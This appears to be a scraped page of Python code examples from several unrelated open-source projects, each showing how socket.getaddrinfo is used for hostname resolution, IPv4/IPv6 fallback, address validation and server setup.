Example #1
0
	def getaddrinfo(cls, host, port, family = None):
		socktype = socket.SOCK_STREAM
		if osIsPosix and\
		   family is None and\
		   host in {"localhost", "127.0.0.1", "::1"} and\
		   False: #XXX disabled, for now
			# We are on posix OS. Instead of AF_INET on localhost,
			# we use Unix domain sockets.
			family = AF_UNIX
			sockaddr = "/tmp/awlsim-server-%d.socket" % port
		else:
			if family in {None, socket.AF_UNSPEC}:
				# First try IPv4
				try:
					family, socktype, proto, canonname, sockaddr =\
						socket.getaddrinfo(host, port,
								   socket.AF_INET,
								   socktype)[0]
				except socket.gaierror as e:
					if e.errno == socket.EAI_ADDRFAMILY:
						# Also try IPv6
						family, socktype, proto, canonname, sockaddr =\
							socket.getaddrinfo(host, port,
									   socket.AF_INET6,
									   socktype)[0]
					else:
						raise e
			else:
				family, socktype, proto, canonname, sockaddr =\
					socket.getaddrinfo(host, port,
							   family,
							   socktype)[0]
		return (family, socktype, sockaddr)
Example #2
0
def _check_resolved_address(sock, address):
    # Ensure that the address is already resolved to avoid the trap of hanging
    # the entire event loop when the address requires doing a DNS lookup.
    family = sock.family
    if family == socket.AF_INET:
        host, port = address
    elif family == socket.AF_INET6:
        host, port = address[:2]
    else:
        return

    type_mask = 0
    if hasattr(socket, 'SOCK_NONBLOCK'):
        type_mask |= socket.SOCK_NONBLOCK
    if hasattr(socket, 'SOCK_CLOEXEC'):
        type_mask |= socket.SOCK_CLOEXEC
    # Use getaddrinfo(flags=AI_NUMERICHOST) to ensure that the address is
    # already resolved.
    try:
        socket.getaddrinfo(host, port,
                           family=family,
                           type=(sock.type & ~type_mask),
                           proto=sock.proto,
                           flags=socket.AI_NUMERICHOST)
    except socket.gaierror as err:
        raise ValueError("address must be resolved (IP address), got %r: %s"
                         % (address, err))
Example #3
0
def ip_extract():
    """ Return list of IP addresses of this system """
    ips = []
    program = find_on_path('ip')
    if program:
        program = [program, 'a']
    else:
        program = find_on_path('ifconfig')
        if program:
            program = [program]

    if sabnzbd.WIN32 or not program:
        try:
            info = socket.getaddrinfo(socket.gethostname(), None)
        except:
            # Hostname does not resolve, use localhost
            info = socket.getaddrinfo('localhost', None)
        for item in info:
            ips.append(item[4][0])
    else:
        p = subprocess.Popen(program, shell=False, stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                             startupinfo=None, creationflags=0)
        output = p.stdout.read()
        p.wait()
        for line in output.split('\n'):
            m = _RE_IP4.search(line)
            if not (m and m.group(2)):
                m = _RE_IP6.search(line)
            if m and m.group(2):
                ips.append(m.group(2))
    return ips
Example #4
0
def is_hostname_sane(hostname):
    """Make sure the given host name is sane.

    Do enough to avoid shellcode from the environment.  There's
    no need to do more.

    :param str hostname: Host name to validate

    :returns: True if hostname is valid, otherwise false.
    :rtype: bool

    """
    # hostnames & IPv4
    allowed = string.ascii_letters + string.digits + "-."
    if all([c in allowed for c in hostname]):
        return True

    if not ALLOW_RAW_IPV6_SERVER:
        return False

    # ipv6 is messy and complicated, can contain %zoneindex etc.
    try:
        # is this a valid IPv6 address?
        socket.getaddrinfo(hostname, 443, socket.AF_INET6)
        return True
    except:
        return False
Example #5
0
    def _getSession(self, content):
        traphost = content['action_destination']
        port = content.get('port', 162)
        destination = '%s:%s' % (traphost, port)

        if not traphost or port <= 0:
            log.error("%s: SNMP trap host information %s is incorrect ", destination)
            return None

        community = content.get('community', 'public')
        version = content.get('version', 'v2c')

        session = self._sessions.get(destination, None)
        if session is None:
            log.debug("Creating SNMP trap session to %s", destination)

            # Test that the hostname and port are sane.
            try:
                getaddrinfo(traphost, port)
            except Exception:
                raise ActionExecutionException("The destination %s is not resolvable." % destination)

            session = netsnmp.Session((
                '-%s' % version,
                '-c', community,
                destination)
            )
            session.open()
            self._sessions[destination] = session

        return session
def validate_hostname(hostname):
    try:
        if ":" in hostname:
            hostname, port = hostname.split(":")
        socket.getaddrinfo(hostname, None)
    except socket.error, e:
        raise OperationError("Could not resolve host '%s', error: %s" % (hostname, e))
Example #7
0
def _resolve_addrs(straddrs, port, ignore_unavailable=False, protocols=[socket.AF_INET, socket.AF_INET6]):
    """ Returns a tupel of tupels of (family, to, original_addr_family, original_addr).

    If ignore_unavailable is set, addresses for unavailable protocols are ignored.
    protocols determines the protocol family indices supported by the socket in use. """

    res = []
    for sa in straddrs:
        try:
            ais = socket.getaddrinfo(sa, port)
            for ai in ais:
                if ai[0] in protocols:
                    res.append((ai[0], ai[4], ai[0], ai[4][0]))
                    break
            else:
                # Try to convert from IPv4 to IPv6
                ai = ais[0]
                if ai[0] == socket.AF_INET and socket.AF_INET6 in protocols:
                    to = socket.getaddrinfo('::ffff:' + ai[4][0], port, socket.AF_INET6)[0][4]
                    res.append((socket.AF_INET6, to, ai[0], ai[4][0]))
        except socket.gaierror:
            if not ignore_unavailable:
                raise

    return res
Example #8
0
 def _matchIPAddress(self, host, certHost):
     # type: (AnyStr, AnyStr) -> bool
     """
     >>> check = Checker()
     >>> check._matchIPAddress(host='my.example.com',
     ...     certHost='my.example.com')
     False
     >>> check._matchIPAddress(host='1.2.3.4', certHost='1.2.3.4')
     True
     >>> check._matchIPAddress(host='1.2.3.4', certHost='*.2.3.4')
     False
     >>> check._matchIPAddress(host='1.2.3.4', certHost='1.2.3.40')
     False
     >>> check._matchIPAddress(host='::1', certHost='::1')
     True
     >>> check._matchIPAddress(host='::1', certHost='0:0:0:0:0:0:0:1')
     True
     >>> check._matchIPAddress(host='::1', certHost='::2')
     False
     """
     try:
         canonical = socket.getaddrinfo(host, 0, 0, socket.SOCK_STREAM, 0,
                                        socket.AI_NUMERICHOST)
         certCanonical = socket.getaddrinfo(certHost, 0, 0,
                                            socket.SOCK_STREAM, 0,
                                            socket.AI_NUMERICHOST)
     except:
         return False
     return canonical == certCanonical
Example #9
0
    def _create_remote_socket(self, ip, port):
        if self._remote_udp:
            addrs_v6 = socket.getaddrinfo("::", 0, 0, socket.SOCK_DGRAM, socket.SOL_UDP)
            addrs = socket.getaddrinfo("0.0.0.0", 0, 0, socket.SOCK_DGRAM, socket.SOL_UDP)
        else:
            addrs = socket.getaddrinfo(ip, port, 0, socket.SOCK_STREAM, socket.SOL_TCP)
        if len(addrs) == 0:
            raise Exception("getaddrinfo failed for %s:%d" % (ip, port))
        af, socktype, proto, canonname, sa = addrs[0]
        if self._forbidden_iplist:
            if common.to_str(sa[0]) in self._forbidden_iplist:
                raise Exception('IP %s is in forbidden list, reject' %
                                common.to_str(sa[0]))
        remote_sock = socket.socket(af, socktype, proto)
        self._remote_sock = remote_sock
        self._fd_to_handlers[remote_sock.fileno()] = self

        if self._remote_udp:
            af, socktype, proto, canonname, sa = addrs_v6[0]
            remote_sock_v6 = socket.socket(af, socktype, proto)
            self._remote_sock_v6 = remote_sock_v6
            self._fd_to_handlers[remote_sock_v6.fileno()] = self
            remote_sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 32)
            remote_sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 32)
            remote_sock_v6.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 32)
            remote_sock_v6.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 32)

        remote_sock.setblocking(False)
        if self._remote_udp:
            pass
        else:
            remote_sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
        return remote_sock
  def test_start_some_fail_to_bind(self):
    failing_server = self.mox.CreateMock(
        wsgi_server._SingleAddressWsgiServer)
    starting_server = self.mox.CreateMock(
        wsgi_server._SingleAddressWsgiServer)
    another_starting_server = self.mox.CreateMock(
        wsgi_server._SingleAddressWsgiServer)
    self.mox.StubOutWithMock(wsgi_server, '_SingleAddressWsgiServer')
    self.mox.StubOutWithMock(socket, 'getaddrinfo')
    socket.getaddrinfo('localhost', 123, socket.AF_UNSPEC, socket.SOCK_STREAM,
                       0, socket.AI_PASSIVE).AndReturn(
                           [(None, None, None, None, ('foo', 'bar', 'baz')),
                            (None, None, None, None, (1, 2, 3, 4, 5)),
                            (None, None, None, None, (3, 4))])
    wsgi_server._SingleAddressWsgiServer(('foo', 'bar'), None).AndReturn(
        failing_server)
    wsgi_server._SingleAddressWsgiServer((1, 2), None).AndReturn(
        starting_server)
    wsgi_server._SingleAddressWsgiServer((3, 4), None).AndReturn(
        another_starting_server)
    starting_server.start()
    failing_server.start().AndRaise(wsgi_server.BindError)
    another_starting_server.start()

    self.mox.ReplayAll()
    self.server.start()
    self.mox.VerifyAll()
    self.assertItemsEqual([starting_server, another_starting_server],
                          self.server._servers)
 def test_retry_limited(self):
   inet4_servers = [self.mox.CreateMock(wsgi_server._SingleAddressWsgiServer)
                    for _ in range(wsgi_server._PORT_0_RETRIES)]
   inet6_servers = [self.mox.CreateMock(wsgi_server._SingleAddressWsgiServer)
                    for _ in range(wsgi_server._PORT_0_RETRIES)]
   self.mox.StubOutWithMock(wsgi_server, '_SingleAddressWsgiServer')
   self.mox.StubOutWithMock(socket, 'getaddrinfo')
   socket.getaddrinfo('localhost', 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
                      socket.AI_PASSIVE).AndReturn(
                          [(None, None, None, None, ('127.0.0.1', 0, 'baz')),
                           (None, None, None, None, ('::1', 0, 'baz'))])
   for offset, (inet4_server, inet6_server) in enumerate(zip(
       inet4_servers, inet6_servers)):
     wsgi_server._SingleAddressWsgiServer(('127.0.0.1', 0), None).AndReturn(
         inet4_server)
     inet4_server.start()
     inet4_server.port = offset + 1
     wsgi_server._SingleAddressWsgiServer(('::1', offset + 1), None).AndReturn(
         inet6_server)
     inet6_server.start().AndRaise(
         wsgi_server.BindError('message', (errno.EADDRINUSE, 'in use')))
     inet4_server.quit()
   self.mox.ReplayAll()
   self.assertRaises(wsgi_server.BindError, self.server.start)
   self.mox.VerifyAll()
Example #12
0
def netGetAddrInfo(host, port, family = None):
	"""getaddrinfo() wrapper.
	"""
	socktype = socket.SOCK_STREAM
	if family in {None, socket.AF_UNSPEC}:
		# First try IPv4
		try:
			family, socktype, proto, canonname, sockaddr =\
				socket.getaddrinfo(host, port,
						   socket.AF_INET,
						   socktype)[0]
		except socket.gaierror as e:
			if e.errno == socket.EAI_ADDRFAMILY:
				# Also try IPv6
				family, socktype, proto, canonname, sockaddr =\
					socket.getaddrinfo(host, port,
							   socket.AF_INET6,
							   socktype)[0]
			else:
				raise e
	else:
		family, socktype, proto, canonname, sockaddr =\
			socket.getaddrinfo(host, port,
					   family,
					   socktype)[0]
	return (family, socktype, sockaddr)
Example #13
0
    def address_info(self):
        if not self._address_info or (datetime.now() - self._address_info_resolved_time).seconds > ADDRESS_INFO_REFRESH_TIME:
            # converts addresses tuple to list and adds a 6th parameter for availability (None = not checked, True = available, False=not available) and a 7th parameter for the checking time
            addresses = None
            try:
                if self.ipc:
                    addresses = [(socket.AF_UNIX, socket.SOCK_STREAM, 0, None, self.host, None)]
                else:
                    addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM, socket.IPPROTO_TCP, socket.AI_ADDRCONFIG | socket.AI_V4MAPPED)
            except (socket.gaierror, AttributeError):
                pass

            if not addresses:  # if addresses not found or raised an exception (for example for bad flags) tries again without flags
                try:
                    addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM, socket.IPPROTO_TCP)
                except socket.gaierror:
                    pass

            if addresses:
                self._address_info = [list(address) + [None, None] for address in addresses]
                self._address_info_resolved_time = datetime.now()
            else:
                self._address_info = []
                self._address_info_resolved_time = datetime(MINYEAR, 1, 1)  # smallest date

            if log_enabled(BASIC):
                for address in self._address_info:
                    log(BASIC, 'address for <%s> resolved as <%r>', self, address[:-2])
        return self._address_info
Example #14
0
def is_socket_address(value):
    """Validate that value is a valid address."""
    try:
        socket.getaddrinfo(value, None)
        return value
    except OSError:
        raise vol.Invalid('Device is not a valid domain name or ip address')
Example #15
0
def resolve(hostname, family=None):
    '''
    Resolves the hostname to one or more IP addresses through the operating
    system. Resolution is carried out for the given address family. If no
    address family is specified, only IPv4 and IPv6 addresses are returned. If
    multiple IP addresses are found, all are returned.

    :return: tuple of unique IP addresses
    '''
    af_ok = (AF_INET, AF_INET6)
    if family is not None and family not in af_ok:
        raise ValueError("Invalid AF_ '%s'" % family)
    ips = ()
    try:
        if family is None:
            addrinfo = socket.getaddrinfo(hostname, None)
        else:
            addrinfo = socket.getaddrinfo(hostname, None, family)
    except socket.gaierror as exc:
        log.debug("socket.getaddrinfo() raised an exception", exc_info=exc)
    else:
        if family is None:
            ips = tuple(set(
                        [item[4][0] for item in addrinfo if item[0] in af_ok]
                        ))
        else:
            ips = tuple(set([item[4][0] for item in addrinfo]))
    return ips
def main(file_path):
    try:
        addfile = open(file_path, "r")
        urlfile = open(file_path,'r')
        writefile = open("valid_url_dest_ips.csv", "w")
        urls = addfile.readlines()

        # Reads the urls line by line and check if its valid. URLs should not contain protocol like http or https.
        for allurls in xrange(0, len(urls) - 1):
            url = urls[allurls].split('/')[2].strip()

            if str(urls[allurls].split(':')[0].strip()) == 'http':
                proto = 80
            else:
                proto = 443
            try:
                destip = socket.getaddrinfo(url, proto, 0, 0, socket.IPPROTO_TCP)
            except Exception, msg:
                try:
                    destip = socket.getaddrinfo(url, proto, 0, 0, socket.IPPROTO_TCP)
                    print "************ " + destip
                except Exception, msg:
                    #print msg
                    writefile.write("%s, \n" % urls[allurls].strip())
                    continue

            # Based on the output of getaddrinfo, extract the IP out of complete return string tuple.
            for tuple in destip:
                for inner_tuple in tuple:
                    if isinstance(inner_tuple, __builtins__.tuple):
                        if len(inner_tuple) == 2:
                            first_val, second_val = inner_tuple
                            writefile.write("%s,%s\n" % (urls[allurls].strip(), first_val))
Example #17
0
    def updatePublicAddress(self):
        if self.config["address"] is not None:
            self.public_host = self.config["address"]
            self.public_ip = [addr[4][0] for addr in socket.getaddrinfo(self.public_host, None) if self._addrIsUsable(addr)][0]
        else:
            try:
                conn = urllib2.urlopen("http://ifconfig.me/all.json", timeout=3)
                data = json.loads(conn.read())
                self.raw_ip, self.raw_host = data["ip_addr"], data["remote_host"]
            except:
                log.err("Couldn't fetch remote IP and hostname")
                self.raw_host = socket.getfqdn()
                ips = [addr[4][0] for addr in socket.getaddrinfo(self.raw_host, None) if self._addrIsUsable(addr)]
                self.raw_ip = ips[0] if ips else "127.0.0.1"

            self.public_host = self.raw_host
            self.public_ip = self.raw_ip

        tcp = map(lambda p: int(p.split(":")[1]), filter(lambda p: p.startswith("tcp"), self.config["endpoints"]))
        if self.config["port"]:
            self.public_port = self.config["port"]
        elif tcp and 80 not in tcp:
            self.public_port = tcp[0]
        else:
            self.public_port = 80

        self.public_address = "http://{}:{:d}/".format(self.public_host, self.public_port) if self.public_port != 80 else "http://{}/".format(self.public_host)
Example #18
0
def get_socket_address(host, port, ipv4_only=False):
    """
    Gather informations to open the server socket.
    Try to resolve the name giving precedence to IPv4 for retro compatibility
    but still mapping the host to an IPv6 address, fallback to IPv6.
    """
    try:
        info = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_DGRAM)
    except socket.gaierror as e:
        try:
            if not ipv4_only:
                info = socket.getaddrinfo(host, port, socket.AF_INET6, socket.SOCK_DGRAM)
            elif host == 'localhost':
                log.warning("Warning localhost seems undefined in your host file, using 127.0.0.1 instead")
                info = socket.getaddrinfo('127.0.0.1', port, socket.AF_INET, socket.SOCK_DGRAM)
            else:
                log.error('Error processing host %s and port %s: %s', host, port, e)
                return None
        except socket.gaierror as e:
            log.error('Error processing host %s and port %s: %s', host, port, e)
            return None

    # we get the first item of the list and map the address for IPv4 hosts
    sockaddr = info[0][-1]
    if info[0][0] == socket.AF_INET and not ipv4_only:
        mapped_host = mapto_v6(sockaddr[0])
        sockaddr = (mapped_host, sockaddr[1], 0, 0)
    return sockaddr
  def _ResolveHostname(self, hostname):
    """Resolve |hostname| into a network hostname.

    If |hostname| is an alias, |self._alias| is updated to be |hostname|.
    If the connection type can be determined during hostname resolution,
    |self.connection_type| is updated to the proper value.

    Args:
      hostname: Can either be a network hostname or user-friendly USB device
        name (aka alias).

    Returns:
      Network hostname as as string.
    """
    # If |hostname| is resolvable via DNS, then it's a valid hostname.
    # If |hostname| is resolvable via Debug Link mDNS, then it's an alias.
    try:
      socket.getaddrinfo(hostname, 0)
      return hostname
    except socket.gaierror:
      ip = GetUSBDeviceIP(hostname)
      if ip:
        self._alias = hostname
        self.connection_type = CONNECTION_TYPE_USB
        return ip
      # |hostname| is not resolvable but may still be valid (eg. ssh hostname).
      # Leave the hostname be.
      return hostname
Example #20
0
 def deeper_search(self):
     
     self.logger.debug('called deeper_search()')
     
     import socket
     d_list = []
     
     try:
         search_list = open(self.wordlist, 'r')
     except WhoException:
         search_list = self.wordlist
     
     for line in search_list:
         d_line = line.rstrip() + "." + self.tld
         try: socket.getaddrinfo(d_line, socket.AF_INET, 0, socket.SOCK_STREAM)
         except WhoException:
             d_list.append(line)
     
     if type(search_list) is ListType:
         pass
     else:
         search_list.close()
     
     self.wordlist = d_list
     x = self.whois_multi_search
     return x     
Example #21
0
def GetServerParms(host, port):
    """ Return processed getaddrinfo() for server
    """
    try:
        int(port)
    except:
        port = 119
    opt = sabnzbd.cfg.ipv6_servers()
    try:
        # Standard IPV4 or IPV6
        ips = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
        if opt == 2 or (_EXTERNAL_IPV6 and opt == 1):
            # IPv6 reachable and allowed, or forced by user
            return ips
        else:
            # IPv6 unreachable or not allowed by user
            return [ip for ip in ips if ':' not in ip[4][0]]
    except:
        if opt == 2 or (_EXTERNAL_IPV6 and opt == 1):
            try:
                # Try IPV6 explicitly
                return socket.getaddrinfo(host, port, socket.AF_INET6,
                                          socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
            except:
                # Nothing found!
                pass
        return None
Example #22
0
def GetServerParms(host, port):
    """ Return processed getaddrinfo() for server """
    try:
        int(port)
    except:
        port = 119
    opt = sabnzbd.cfg.ipv6_servers()
    ''' ... with the following meaning for 'opt':
    Control the use of IPv6 Usenet server addresses. Meaning:
    0 = don't use
    1 = use when available and reachable (DEFAULT)
    2 = force usage (when SABnzbd's detection fails)
    '''
    try:
        # Standard IPV4 or IPV6
        ips = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
        if opt == 2 or (opt == 1 and sabnzbd.EXTERNAL_IPV6) or (opt == 1 and sabnzbd.cfg.load_balancing() == 2):
            # IPv6 forced by user, or IPv6 allowed and reachable, or IPv6 allowed and loadbalancing-with-IPv6 activated
            # So return all IP addresses, no matter IPv4 or IPv6:
            return ips
        else:
            # IPv6 unreachable or not allowed by user, so only return IPv4 address(es):
            return [ip for ip in ips if ':' not in ip[4][0]]
    except:
        if opt == 2 or (opt == 1 and sabnzbd.EXTERNAL_IPV6) or (opt == 1 and sabnzbd.cfg.load_balancing() == 2):
            try:
                # Try IPV6 explicitly
                return socket.getaddrinfo(host, port, socket.AF_INET6,
                                          socket.SOCK_STREAM, socket.IPPROTO_IP, socket.AI_CANONNAME)
            except:
                # Nothing found!
                pass
        return False
Example #23
0
def get_hostname(local = ''):
    if platform.system() in ['Windows', 'Microsoft']:
        if local == 'true':
            return '0.0.0.0'
        else:
            #have to change to IP address of machine to load data into if running over the network
            return '0.0.0.0'
    else:
        if local == 'true':
            #have to change to IP address of local machine if running over the network
            hostname = socket.gethostname()
            address_list = socket.getaddrinfo(hostname,None)
            if len(address_list) > 0:
                ipv6_tuple_index = len(address_list) - 1
                return address_list[ipv6_tuple_index][4][0]
            else:
                return hostname
        else:
            #have to change to IP address of machine to load data into if running over the network
            hostname = socket.gethostname()
            # getaddrinfo(host,port) returns a list of tuples
            # in the form of (family, socktype, proto, canonname, sockaddr)
            # and we extract the IP address from 'sockaddr'
            address_list = socket.getaddrinfo(hostname,None)
            if len(address_list) > 0:
                ipv6_tuple_index = len(address_list) - 1
                return address_list[ipv6_tuple_index][4][0]
            else:
                return hostname
Example #24
0
def connect(host, port, ipv6=0, bind="0.0.0.0", bindport=0):
    if ipv6:
        af_inet = socket.AF_INET6
    else:
        af_inet = socket.AF_INET
    if not bindport:
        bindport = random.choice(range(40000, 50000))
    s = None
    for res in socket.getaddrinfo(bind, bindport, af_inet, socket.SOCK_STREAM):
        vhost = res[4]
        for res in socket.getaddrinfo(host, port, af_inet, socket.SOCK_STREAM):
            af, socktype, proto, canonname, sa = res
            try:
                s = socket.socket(af, socktype, proto)
            except socket.error, e:
                s = None;error=e
                continue
            try:
                s.bind(vhost)
                s.connect(sa)
            except socket.error, e:
                s.close()
                s = None;error=e
                continue
            break
 def start(self):
     INFO("{} starting with pid: {}".format(self.name, self.pid))
     kill_processes(self.name, manager_logger)
     ck = ChildKiller(self.name, manager_logger, redis=True)
     ck.daemon = True
     ck.start()
     loc_addr = {addr[4][0] for addr in
                 socket.getaddrinfo('localhost', 80) +
                 socket.getaddrinfo(socket.getfqdn(), 80)}
     for single_repl in self.shard_list:
         for db_attr in single_repl:
             cfg_addr = {addr[4][0] for addr in
                 socket.getaddrinfo(db_attr['host'], 80)}
             if loc_addr & cfg_addr:
                 srv = RedisManager(db_attr, self.done_q)
                 srv.daemon = True
                 srv.start()
                 self.srvs.append(srv)
                 INFO('Redis Manager {} spawned'.format(db_attr))
     for _ in self.srvs:
         try:
             db_attr = self.done_q.get(timeout=INIT_WAIT_LIMIT)
             db_attr.pop('db')
             INFO('Redis Manager {} started'.format(db_attr))
         except Empty:
             ERROR("{}:: Unable to start all Redis Managers."
                 .format(self.name))
             sys.exit(1)
     for srv in self.srvs:
         srv.join()
     ck.join()
 def _is_local(self, host):
     loc_addr = {addr[4][0] for addr in
                 socket.getaddrinfo('localhost', 80) +
                 socket.getaddrinfo(socket.getfqdn(), 80)}
     cfg_addr = {addr[4][0] for addr in
                 socket.getaddrinfo(host, 80)}
     return loc_addr & cfg_addr
def port_to_tcp(port=None):
    """Returns local tcp address for a given `port`, automatic port if `None`"""
    #address = 'tcp://' + socket.gethostbyname(socket.getfqdn())
    domain_name = socket.getfqdn()
    try:
        addr_list = socket.getaddrinfo(domain_name, None)
    except Exception:
        addr_list = socket.getaddrinfo('127.0.0.1', None)
    family, socktype, proto, canonname, sockaddr = addr_list[0]
    host = convert_ipv6(sockaddr[0])
    address =  'tcp://' + host
    if port is None:
        port = ()
    if not isinstance(port, int):
        # determine port automatically
        context = zmq.Context()
        try:
            socket_ = context.socket(zmq.REP)
            socket_.ipv6 = is_ipv6(address)
            port = socket_.bind_to_random_port(address, *port)
        except Exception:
            print('Could not connect to {} using {}'.format(address, addr_list))
            pypet_root_logger = logging.getLogger('pypet')
            pypet_root_logger.exception('Could not connect to {}'.format(address))
            raise
        socket_.close()
        context.term()
    return address + ':' + str(port)
Example #28
0
    def network_details():
        """
        Returns details about the network links
        """
        # Get IPv4 details
        ipv4_addresses = [info[4][0] for info in socket.getaddrinfo(
            socket.gethostname(), None, socket.AF_INET)]

        # Add localhost
        ipv4_addresses.extend(info[4][0] for info in socket.getaddrinfo(
            "localhost", None, socket.AF_INET))

        # Filter addresses
        ipv4_addresses = sorted(set(ipv4_addresses))

        try:
            # Get IPv6 details
            ipv6_addresses = [info[4][0] for info in socket.getaddrinfo(
                socket.gethostname(), None, socket.AF_INET6)]

            # Add localhost
            ipv6_addresses.extend(info[4][0] for info in socket.getaddrinfo(
                "localhost", None, socket.AF_INET6))

            # Filter addresses
            ipv6_addresses = sorted(set(ipv6_addresses))
        except (socket.gaierror, AttributeError):
            # AttributeError: AF_INET6 is missing in some versions of Python
            ipv6_addresses = None

        return {"IPv4": ipv4_addresses, "IPv6": ipv6_addresses,
                "host.name": socket.gethostname(),
                "host.fqdn": socket.getfqdn()}
Example #29
0
def read_network():
    netdict = {}
    netdict['class'] = "NETINFO"

    netdict['hostname'], netdict['ipaddr'], netdict['ip6addr'] = findHostByRoute()

    if netdict['hostname'] == "unknown":
        netdict['hostname'] = gethostname()
        if "." not in netdict['hostname']:
            netdict['hostname'] = socket.getfqdn()

    if netdict['ipaddr'] is None:
        try:
            list_of_addrs = getaddrinfo(netdict['hostname'], None)
            ipv4_addrs = filter(lambda x:x[0]==socket.AF_INET, list_of_addrs)
            # take first ipv4 addr
            netdict['ipaddr'] = ipv4_addrs[0][4][0]
        except:
            netdict['ipaddr'] = "127.0.0.1"

    if netdict['ip6addr'] is None:
        try:
            list_of_addrs = getaddrinfo(netdict['hostname'], None)
            ipv6_addrs = filter(lambda x:x[0]==socket.AF_INET6, list_of_addrs)
            # take first ipv6 addr
            netdict['ip6addr'] = ipv6_addrs[0][4][0]
        except:
            netdict['ip6addr'] = "::1"

    if netdict['ipaddr'] is None:
        netdict['ipaddr'] = ''
    if netdict['ip6addr'] is None:
        netdict['ip6addr'] = ''
    return netdict
def resolveHostnamePort(hostnamePort=''):
    """ hostname:port sanity check """

    hostname = urlparse.urlparse(hostnamePort)[1].split(':')
    port = ''
    if len(hostname) > 1:
        hostname, port = hostname[:2]
    else:
        hostname = hostname[0]

    if port:
        try:
            x = int(port)
            if str(x) != port:
                raise ValueError('should be an integer: %s' % port)
        except ValueError:
            sys.stderr.write("ERROR: the port setting is not an integer: %s\n" % port)
            sys.exit(1)

    if hostname:
        try:
            socket.getaddrinfo(hostname, None)
        except:  # pylint: disable=W0702
            errorCode, errorString = _errorHandler()
            sys.stderr.write(errorString + '\n')
            sys.exit(errorCode)
Example #31
0
    def slurp(self, proto, url):
        # We generate these tokens:
        #  url:non_resolving
        #  url:non_html
        #  url:http_XXX (for each type of http error encounted,
        #                for example 404, 403, ...)
        # And tokenise the received page (but we do not slurp this).
        # Actually, the special url: tokens barely showed up in my testing,
        # although I would have thought that they would more - this might
        # be due to an error, although they do turn up on occasion.  In
        # any case, we have to do the test, so generating an extra token
        # doesn't cost us anything apart from another entry in the db, and
        # it's only two entries, plus one for each type of http error
        # encountered, so it's pretty neglible.
        # If there is no content in the URL, then just return immediately.
        # "http://)" will trigger this.
        if not url:
            return ["url:non_resolving"]

        from spambayes.tokenizer import Tokenizer

        if options["URLRetriever", "x-only_slurp_base"]:
            url = self._base_url(url)

        # Check the unretrievable caches
        for err in self.bad_urls.keys():
            if url in self.bad_urls[err]:
                return [err]
        if self.http_error_urls.has_key(url):
            return self.http_error_urls[url]

        # We check if the url will resolve first
        mo = DOMAIN_AND_PORT_RE.match(url)
        domain = mo.group(1)
        if mo.group(3) is None:
            port = 80
        else:
            port = mo.group(3)
        try:
            _unused = socket.getaddrinfo(domain, port)
        except socket.error:
            self.bad_urls["url:non_resolving"] += (url, )
            return ["url:non_resolving"]

        # If the message is in our cache, then we can just skip over
        # retrieving it from the network, and get it from there, instead.
        url_key = URL_KEY_RE.sub('_', url)
        cached_message = self.urlCorpus.get(url_key)

        if cached_message is None:
            # We're going to ignore everything that isn't text/html,
            # so we might as well not bother retrieving anything with
            # these extensions.
            parts = url.split('.')
            if parts[-1] in ('jpg', 'gif', 'png', 'css', 'js'):
                self.bad_urls["url:non_html"] += (url, )
                return ["url:non_html"]

            # Waiting for the default timeout period slows everything
            # down far too much, so try and reduce it for just this
            # call (this will only work with Python 2.3 and above).
            try:
                timeout = socket.getdefaulttimeout()
                socket.setdefaulttimeout(5)
            except AttributeError:
                # Probably Python 2.2.
                pass
            try:
                if options["globals", "verbose"]:
                    print >> sys.stderr, "Slurping", url
                f = urllib2.urlopen("%s://%s" % (proto, url))
            except (urllib2.URLError, socket.error), details:
                mo = HTTP_ERROR_RE.match(str(details))
                if mo:
                    self.http_error_urls[url] = "url:http_" + mo.group(1)
                    return ["url:http_" + mo.group(1)]
                self.bad_urls["url:unknown_error"] += (url, )
                return ["url:unknown_error"]
            # Restore the timeout
            try:
                socket.setdefaulttimeout(timeout)
            except AttributeError:
                # Probably Python 2.2.
                pass

            try:
                # Anything that isn't text/html is ignored
                content_type = f.info().get('content-type')
                if content_type is None or \
                   not content_type.startswith("text/html"):
                    self.bad_urls["url:non_html"] += (url, )
                    return ["url:non_html"]

                page = f.read()
                headers = str(f.info())
                f.close()
            except socket.error:
                # This is probably a temporary error, like a timeout.
                # For now, just bail out.
                return []

            fake_message_string = headers + "\r\n" + page

            # Retrieving the same messages over and over again will tire
            # us out, so we store them in our own wee cache.
            message = self.urlCorpus.makeMessage(url_key, fake_message_string)
            self.urlCorpus.addMessage(message)
class Probe(object):
    CLIENT_ENV_VAR = "SHOULD_NOT_BE_SET"

    DESIRED_ENVIRONMENT = {
        "MYENV":
        "hello",
        "EXAMPLE_ENVFROM":
        "foobar",
        "EX_MULTI_LINE": ("first line = (no newline before, newline after)\n"
                          "second line = (newline before and after)\n"),
        "EX_JSON_BLOB_FROM_597":
        _json_blob,
    }

    # A resource available from a server running on the Telepresence host
    # which the tests can use to verify correct routing-to-host behavior from
    # the Telepresence execution context.
    LOOPBACK_URL_TEMPLATE = "http://localhost:{}/test_endtoend.py"

    # Commands which indirectly interact with Telepresence in some way and
    # which may not be s upported (and which we care about them failing in a
    # nice way).
    QUESTIONABLE_COMMANDS = [
        "ping",
        "traceroute",
        "nslookup",
        "host",
        "dig",
    ]

    # Paths relative to $TELEPRESENCE_ROOT in the Telepresence execution
    # context which the probe will read and return to us.
    INTERESTING_PATHS = [
        "podinfo/labels",
        "var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
    ]

    # Get some httpbin.org addresses.  We avoid the real domain name in the
    # related tests due to
    # <https://github.com/datawire/telepresence/issues/379>.
    _httpbin = iter(getaddrinfo(
        "httpbin.org",
        80,
        AF_INET,
        SOCK_STREAM,
    ))

    #
    # Also notice that each ALSO_PROXY_... uses non-overlapping addresses
